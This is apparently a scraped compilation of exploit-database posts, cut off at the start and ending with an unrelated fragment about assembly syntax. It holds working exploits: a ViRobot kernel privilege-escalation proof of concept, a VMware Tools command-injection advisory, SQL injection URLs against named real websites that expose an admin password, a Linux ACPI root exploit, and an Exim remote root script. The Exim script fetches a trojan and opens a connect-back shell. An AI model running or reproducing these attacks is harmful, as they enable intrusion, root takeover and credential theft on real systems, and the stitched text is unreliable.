);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" ViRobot Desktop 5.5 and below "
" ViRobot Server 3.5 and below "
" "
" VULERABLE FILE "
" VRsecos.sys <= 2008.8.1.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-8-22 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
int main(int argc, char* argv[])
{
printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"This Exploit Code Only for vrsecos == 2008.8.1.1\n"
"Test On Windows XP SP3\n\n"
"By MJ0011 th_decoder$126.com\n\n"
"Press Enter\n");
getchar();
HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device....%u\n" , GetLastError());
//return 0;
}
//data for IoControlCode = 8307202C , buffer overrun
PVOID pdata = malloc(0x2000);
//fill non-zero data
memset(pdata , 0x20 , 0x2000);
//process mutx ...
PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
//get base address of vrsecos.sys
PVOID vrsecosbase = 0 ;
ULONG i ;
for (i = 0 ; i < pmi->Count ; i ++)
{
if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) ,
"vrsecos.sys") == 0 )
{
vrsecosbase = pmi->Module[i].Base;
break ;
}
}
if (vrsecosbase == 0 )
{
printf("cannot find vrsecos....\n");
//return 0 ;
}
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
//get thread object
PVOID MyThreadOBJ = NULL ;
for (i = 0 ; i < phi->NumberOfHandles ; i ++)
{
if (phi->Information[i].HandleValue == (USHORT)hthread &&
phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
{
MyThreadOBJ = phi->Information[i].Object;
break ;
}
}
if (MyThreadOBJ == NULL)
{
printf("cannot find my thread object\n");
return 0 ;
}
//for KeWaitForSingleObject
//KeWaitForSingleObject will check SignalState
pmutant->Header.SignalState = 0x30303030;
pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
//for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
pmutant->OwnerThread = MyThreadOBJ;
//for IOCTL CODE 0x83072014
//spec NPAGED_LOOKASIDE_LIST List
//
// user address space
PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
if (pAlloc == NULL)
{
printf("cannot allocate spec addr %u\n! ", GetLastError());
return 0 ;
}
*(DWORD*)0x0a0a0101 = 0 ;
// vrsecos+2d68 < vrsecos+2d64
// and vrsecos+2d68 < 0
*(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
*(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
//fill NPAGED_LOOKASIDE_LIST
*(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
*(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
//fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
//is our R0 Shell Code !!!
*(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
ULONG btr ;
ULONG temp;
//memory overflow!!
if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
{
printf("dev ctl 1 failed %u\n", GetLastError());
return 0 ;
}
PVOID pdata2 = malloc(0x6d4);
*(DWORD*)pdata2 = 1;
*(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
//first time , NPAGED_LOOKASIDE_LIST got ZERO !!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
//second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
return 0 ;
}
========================================
VMware Tools update OS Command Injection
========================================
1. Advisory Information
Advisory ID: BONSAI-2010-0110
Date published: Thu Dec 9, 2010
Vendors contacted: VMware
Release mode: Coordinated release
2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-4297
3. Software Description
VMware Tools is a suite of utilities that enhances the performance of
the virtual machine's guest operating system and improves management of
the virtual machine. Without VMware Tools installed in your guest
operating system, guest performance lacks important functionality.
Installing VMware Tools eliminates or improves the following issues:
* low video resolution
* inadequate color depth
* incorrect display of network speed
* restricted movement of the mouse
* inability to copy and paste and drag-and-drop files
* missing sound
VMware Tools includes these components:
* VMware Tools service
* VMware device drivers
* VMware user process
* VMware Tools control panel
VMware Tools is provided in the following formats:
* ISOs (contain .tar and .rpm files) – packaged with the product and
are installed in a number of ways, depending upon the VMware product and
the guest operating system installed in the virtual machine. VMware
Tools provides a different ISO file for each type of supported guest
operating system: Windows, Linux, NetWare, Solaris, and FreeBSD.
* Operating System Specific Packages (OSPs) – downloaded and
installed from the command line. VMware Tools is available as separate
downloadable, light-weight packages that are specific to each supported
Linux operating system and VMware product. OSPs are an alternative to
the existing mechanism for installing VMware Tools and only support
Linux systems running on ESX.
4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.
5. Vulnerable packages
Column 4 of the following table lists the action required to remediate
the vulnerability in each release, if a solution is available:
VMware Product | Product Version | Running On | Replace with / Apply Patch |
---|---|---|---|
VirtualCenter | any | Windows | not affected |
Workstation | 7.X | any | 7.1.2 Build 301548 or later |
Workstation | 6.5.X | any | 6.5.5 Build 328052 or later |
Player | 3.1.X | any | 3.1.2 Build 301548 or later |
Player | 2.5.X | any | 2.5.5 Build 328052 or later |
AMS | any | any | not affected |
Server | 2.0.2 | any | affected, no patch planned |
Fusion | 3.1.X | Mac OSX | 3.1.2 Build 332101 |
Fusion | 2.X | Mac OSX | 2.0.8 Build 328035 |
ESXi | 4.1 | ESXi | ESXi410-201010402-BG |
ESXi | 4.0 | ESXi | ESXi400-201009402-BG |
ESXi | 3.5 | ESXi | ESXe350-201008402-T-BG ** |
ESX | 4.1 | ESX | ESX410-201010405-BG |
ESX | 4.0 | ESX | ESX400-201009401-SG |
ESX | 3.5 | ESX | ESX350-201008409-BG ** |
ESX | 3.0.3 | ESX | not affected |
* Hosted products are VMware Workstation, Player, ACE, Fusion.
** Non-Windows-based guest systems on ESXi 3.5 and ESX 3.5 only:
- Install the relevant ESX patch.
- Manually upgrade the tools in the virtual machine (virtual machine
users will not be prompted to upgrade tools). Note that the VI Client may
not show that VMware Tools is out of date in the summary tab.
The full VMware advisory can be found at:
http://www.vmware.com/security/advisories/VMSA-2010-0018.html
6. Non-vulnerable packages
See above table.
7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).
8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
VMware Server Infrastructure Web Access is prone to a remote command
execution vulnerability because the software fails to adequately
sanitize user-supplied input.
When updating VMware Tools on a guest virtual machine, a command
injection attack can be carried out by sending specially crafted parameters.
Successful attacks can compromise the affected guest virtual machine
with root privileges.
The following proof of concept is given. It was exploited in a GNU/Linux
Guest with VMware Tools installed but not fully updated:
POST /ui/sb HTTP/1.1
[…]
Cookie: JSESSIONID=F78CCA7DD3CF4E2E82587B236660C9ED; user_name=vmuser;
l=http%3A%2F%2Flocalhost%3A80%2Fsdk
[…]
[{i:"378",exec:"/cmd/vm",args:["UpgradeTools_Task",{_i:"VirtualMachine|960"},";
INJECTED COMMAND HERE ;"]}]
9. Report Timeline
• 2010-04-24 / Vulnerabilities were identified
• 2010-04-29 – 2010-12-02 / Multiple Contacts with Vendor
• 2010-12-09 / Vulnerability is Disclosed – PoC attached
10. About Bonsai
Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in early 2009 in Buenos Aires, Argentina, we are fully
committed to quality service and focused on our customers’ real needs.
11. Disclaimer
The contents of this advisory are copyright (c) 2010 Bonsai Information
Security, and may be distributed freely provided that no fee is charged
for this distribution and proper credit is given.
======================================================
UltraVintage <= Remote Multiple SQL Injection Exploits
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ############################################ 7
1 I'm KnocKout 1337 Member from 1337 DataBase 1
3 ############################################ 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
##############################################################
exploit(lamer)-DB.com FUCK YOUR N00B LAMERS!!!
Kralınız gelsin. mua:) siksqlZkırev..
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : UltraVintage
|~Price : N/A
|~Version : N/A
|~Software: http://www.ultravintage.com/
|~Vulnerability Style : SQL Injection & based
|~Vulnerability Dir : /
|~sqL : MysqL
|~Google Keyword : "Powered by UltraVintage"
|[~]Date : "19.12.2010"
|[~]Tested on : (L):Vista (R):Apache/2.2.3 (CentOS) PHP/5.2.6 MYSQL DEMOS
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Exploitation| main.php SQL Injection~~~~~~~~~~~}|
http://$localhost/$path/details.php?id=1 { SQL Injection}
Ex; http://www.pioneerhi-bred.gr
[~] SQL Injecting
http://www.pioneerhi-bred.gr/main.php?id=1%20union%20select%201,concat%28loginname,0x3a,password%29,3,4,5%20from%20phplist_admin
[~] MySQL Writes : admin:pioneerhibred!23
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POC Exploit
<html>
<body>
<form
action="http://www.pioneerhi-bred.gr/main.php?id=1%20union%20select%201,concat%28loginname,0x3a,password%29,3,4,5%20from%20phplist_admin"
method="POST">
<input type="submit" name="kieli" value="Click and SQL Injection for click Enter">
</form>
</body>
</html>
#######################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Exploitation| main.php Based SQL Injection~~~~~~~~~~~}|
http://$localhost/$path/details.php?id=1 {BASED SQL INJECTION}
Ex; http://www.sunrisepv.gr
[~]SQL Injecting..
http://www.sunrisepv.gr/main.php?id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
[~]Mysql Writes : Duplicate entry '~'sunris___uvdb'~1' for key 1
[+]Database OK: 'sunris___uvdb'
#######################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POC Exploit
<html>
<body>
<form
action="http://www.sunrisepv.gr/main.php?id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1"
method="POST">
<input type="submit" name="kieli" value="Click and SQL Injection for click Enter">
</form>
</body>
</html>
=================================================================
Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
=================================================================
/*
* american-sign-language.c
*
* Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
* The custom_method file allows injecting custom ACPI methods into the ACPI
* interpreter's tables. This control file was introduced with world-writable
* permissions in Linux kernel 2.6.33.
*
* Usage:
*
* $ gcc american-sign-language.c -o american-sign-language
* $ ./american-sign-language
* [+] resolving required symbols...
* [+] checking for world-writable custom_method...
* [+] checking for an ACPI LID device...
* [+] poisoning ACPI tables via custom_method...
* [+] triggering ACPI payload via LID device...
* [+] triggering exploit via futimesat...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
* This vuln allows us to write custom ACPI methods and load them into the
* kernel as an unprivileged user. We compile some fancy ASL down to AML
* that overrides the ACPI method used when the status of the LID device is
* queried (eg. 'open' or 'closed' lid on a laptop). When the method is
* triggered, it overlays an OperationRegion on the physical address where
* sys_futimesat is located and overwrites the memory via the Store to
* escalate privileges whenever sys_futimesat is called.
*
* The payload is 64-bit only and depends on the existence of a LID device
* (eg. laptop), but the exploit will still tell you if you're vulnerable
* regardless. If you don't know how to work around these limitations, you
* probably shouldn't be running this in the first place. :-P
*
* Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>
/*
* The ASL payload looks like:
*
* DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {
* Method (\_SB.LID._LID, 0, NotSerialized) {
* OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)
* Field(KMEM, AnyAcc, NoLock, Preserve) {
* HACK, 0x392
* }
* Store (Buffer () {
* 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,
* 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,
* 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,
* 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
* 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,
* 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,
* 0xc3 }, HACK)
* Return (One)
* }
* }
*
* Feel free to `iasl -d` this if you don't trust me! ;-)
*/
#define PAYLOAD_AML \
"\x53\x53\x44\x54\x90\x00\x00\x00\x02\x3e\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x49\x4e\x54\x4c" \
"\x21\x05\x09\x20\x14\x4b\x06\x5c\x2f\x03\x5f\x53\x42\x5f\x4c\x49" \
"\x44\x5f\x5f\x4c\x49\x44\x00\x5b\x80\x4b\x4d\x45\x4d\x00\x0c\xe0" \
"\x61\x17\x01\x0b\x92\x03\x5b\x81\x0c\x4b\x4d\x45\x4d\x00\x48\x41" \
"\x43\x4b\x42\x39\x70\x11\x34\x0a\x31\x55\x48\x89\xe5\x53\x48\x83" \
"\xec\x08\x48\xc7\xc3\x24\x24\x24\x24\x48\xc7\xc0\x24\x24\x24\x24" \
"\xbf\x00\x00\x00\x00\xff\xd0\x48\x89\xc7\xff\xd3\x48\xc7\xc0\xb7" \
"\xff\xff\xff\x48\x83\xc4\x08\x5b\xc9\xc3\x48\x41\x43\x4b\xa4\x01"
#define PAYLOAD_LEN 144
#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"
#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}
int
main(int argc, char **argv)
{
int ret;
FILE *fp;
char buf[64];
struct stat sb;
char payload[PAYLOAD_LEN] = PAYLOAD_AML;
unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;
printf("[+] resolving required symbols...\n");
sys_futimesat = get_symbol("sys_futimesat");
if (!sys_futimesat) {
printf("[-] sys_futimesat symbol not found, aborting!\n");
exit(1);
}
prepare_kernel_cred = get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
exit(1);
}
commit_creds = get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] commit_creds symbol not found, aborting!\n");
exit(1);
}
printf("[+] checking for world-writable custom_method...\n");
ret = stat(CUSTOM_METHOD, &sb);
if (ret < 0) {
printf("[-] custom_method not found, kernel is not vulnerable!\n");
exit(1);
}
if (!(sb.st_mode & S_IWOTH)) {
printf("[-] custom_method not world-writable, kernel is not vulnerable!\n");
exit(1);
}
printf("[+] checking for an ACPI LID device...\n");
ret = stat(HEY_ITS_A_LID, &sb);
if (ret < 0) {
printf("[-] ACPI LID device not found, but kernel is still vulnerable!\n");
exit(1);
}
if (sizeof(sys_futimesat) != 8) {
printf("[-] payload is 64-bit only, but kernel is still vulnerable!\n");
exit(1);
}
sys_futimesat &= ~0xffffffff80000000;
memcpy(&payload[63], &sys_futimesat, 4);
memcpy(&payload[101], &commit_creds, 4);
memcpy(&payload[108], &prepare_kernel_cred, 4);
printf("[+] poisoning ACPI tables via custom_method...\n");
fp = fopen(CUSTOM_METHOD, "w");
fwrite(payload, 1, sizeof(payload), fp);
fclose(fp);
printf("[+] triggering ACPI payload via LID device...\n");
fp = fopen(HEY_ITS_A_LID, "r");
fread(&buf, 1, sizeof(buf), fp);
fclose(fp);
printf("[+] triggering exploit via futimesat...\n");
ret = futimesat(0, "/tmp", NULL);
if (ret != -1 || errno != EDOTDOT) {
printf("[-] unexpected futimesat errno, exploit failed!\n");
exit(1);
}
if (getuid() != 0) {
printf("[-] privileges not escalated, exploit failed!\n");
exit(1);
}
printf("[+] launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
}
======================== Exim 4.63 Remote Exploit ======================== #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE; system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE; system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system); ---snip--- =cut use IO::Socket; if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; } $|=1; $trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com"; $max_msg = 52428800; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp'); while(<$sock>) { print; if ($_ =~ /220 /) { last;} } print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ 
=~ /250 /) { last;} } if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; } $vv .= "(" . $helohost . ")"; $from = "root\@local.com"; $to = "postmaster\@localhost"; $msg_len = $max_msg + 1024*256; $logbuffer_size = 8192; $logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n"; $filler = "V" x (8 * 16); $logbuffer_size -= 3; for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; } $hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; } $v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; } $body = substr($body, 0, $msg_len); print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v; print "Sending large buffer, please wait...\n"; print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; while(1){}; # 1337db.com [2010-12-11]
A computer understands only two symbols: 1 and 0.
Assembly language is the mnemonic form of machine-language instructions (which are binary), called opcodes.
Note that the difference between NASM and AT&T syntax is purely a matter of notation; both produce exactly the same machine code.
- Comment lines begin with ";" (semicolon) in NASM. AT&T begins comments with # (hash).
- In AT&T format, every register is prefixed with %. NASM does not use %.
- In AT&T format, every literal value (constant) is prefixed with $. NASM does not use $.
